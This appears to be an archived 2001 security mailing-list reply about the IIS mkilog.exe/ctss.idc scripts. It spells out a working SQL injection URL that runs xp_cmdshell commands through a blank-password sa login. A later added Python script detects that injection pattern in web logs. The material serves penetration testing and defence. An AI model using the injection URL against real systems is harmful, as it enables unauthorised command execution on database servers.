mkilog.exe simply posts data to ctss.idc, which creates a table based on the
parameters it gets:

[ctss.idc]
Datasource: %ds%
Username: %user%
Password: %pwd%
Template: ct.htx
SQLStatement:
+create table %table% (
+ClientHost varchar(50), username varchar(50),
+LogTime datetime, service varchar( 20), machine varchar( 20),
+serverip varchar( 50), processingtime int, bytesrecvd int,
+bytessent int, servicestatus int, win32status int,
+operation varchar( 200), target varchar(200), parameters text )

If you pass a correct DataSource, User, and Password (LocalServer, sa, blank
password for locally installed servers), then change the table to:

bogustable(bleh int); EXEC master..xp_cmdshell("cmd.exe /c echo 0wned");--

You can use it to run system commands. In this case, the actual query you
would send is (lines probably wrapped):

/scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=bogustable(bleh int);EXEC+master..xp_cmdshell("cmd.exe+/c echo+0wned");--

For every query you run you have to create another garbage table, so remember
to clean up all those bogus tables when you are done. For some reason SQL
Server 6.5 limits your command parameter to 30 characters when executed this
way (which is _really_ annoying); I haven't been able to track down why yet.

Good luck!

-HD

http://www.digitaloffense.net (play)
http://www.digitaldefense.net (work)

On Tuesday 31 July 2001 06:48 am, César González wrote:
> Hello all,
>
> I am doing a penetration test, and some vulnerability scanners alert
> about the script mkilog.exe. More exactly, Nessus said the following:
>
> The CGI /scripts/tools/mkilog.exe is present.
>
> This CGI allows an attacker to view and modify SQL database
> contents.
>
> No securityfocus links, CVE advisory, etc. I have searched the most popular
> security search engines but nothing appears. Any help will be appreciated.
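A defender-side check for the request pattern described in the reply above, as an added example that is not part of the original post: it scans web server log lines for requests to ctss.idc or mkilog.exe whose table parameter is anything other than a plain identifier. The log field order, the sample lines and the rule that legitimate table names are plain identifiers are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines; assumed fields: date time c-ip method uri-stem uri-query status
SAMPLE_LOG = '''\
2001-07-31 13:02:11 192.0.2.10 GET /scripts/tools/ctss.idc ds=LocalServer&user=weblog&pwd=x&table=iislog_july 200
2001-07-31 13:05:40 192.0.2.77 GET /scripts/tools/ctss.idc ds=LocalServer&user=sa&pwd=&table=bogustable(bleh+int);EXEC+master..xp_cmdshell("cmd.exe+/c+echo+0wned");-- 200
2001-07-31 13:06:02 192.0.2.77 GET /default.htm - 200
2001-07-31 13:07:19 192.0.2.77 GET /Scripts/Tools/CTSS.IDC ds=LocalServer&user=sa&pwd=&table=t2%28x+int%29%3BEXEC+master..XP_CMDSHELL%28%22cmd.exe+/c+echo+0wned%22%29%3B-- 200
'''

WATCHED = ("/scripts/tools/ctss.idc", "/scripts/tools/mkilog.exe")
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*\Z")  # assumption: real names look like this
# (reason, predicate on the URL-decoded table value)
TABLE_CHECKS = [
    ("table is not a plain identifier", lambda t: not IDENT.match(t)),
    ("statement separator in table", lambda t: ";" in t),
    ("SQL comment in table", lambda t: "--" in t),
    ("xp_cmdshell in table", lambda t: "xp_cmdshell" in t.lower()),
]

def parse_query(raw):
    """Split on '&' only, then URL-decode, so ';' inside a value survives."""
    pairs = (p.partition("=") for p in raw.split("&"))
    return {k.lower(): unquote_plus(v) for k, _, v in pairs}

def findings(line):
    """Reasons this log line looks like abuse of ctss.idc / mkilog.exe."""
    fields = line.split()
    if len(fields) < 7 or fields[4].lower() not in WATCHED:
        return []
    params = parse_query(fields[5])
    table = params.get("table", "")
    reasons = [why for why, test in TABLE_CHECKS if table and test(table)]
    if params.get("user", "").lower() == "sa" and not params.get("pwd"):
        reasons.append("sa login with blank password")
    return reasons

def scan(log_text):
    """Map client IP -> sorted reasons across all flagged lines."""
    hits = {}
    for line in log_text.splitlines():
        for why in findings(line):
            hits.setdefault(line.split()[2], set()).add(why)
    return {ip: sorted(whys) for ip, whys in hits.items()}

if __name__ == "__main__":
    for ip, whys in scan(SAMPLE_LOG).items():
        print(ip, whys)
```

Matching on the decoded value rather than the raw query string is what lets the percent-encoded, mixed-case request in the last sample line be flagged alongside the plain one.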
This archive was generated by hypermail 2b30 : Tue Jul 31 2001 - 15:19:31 PDT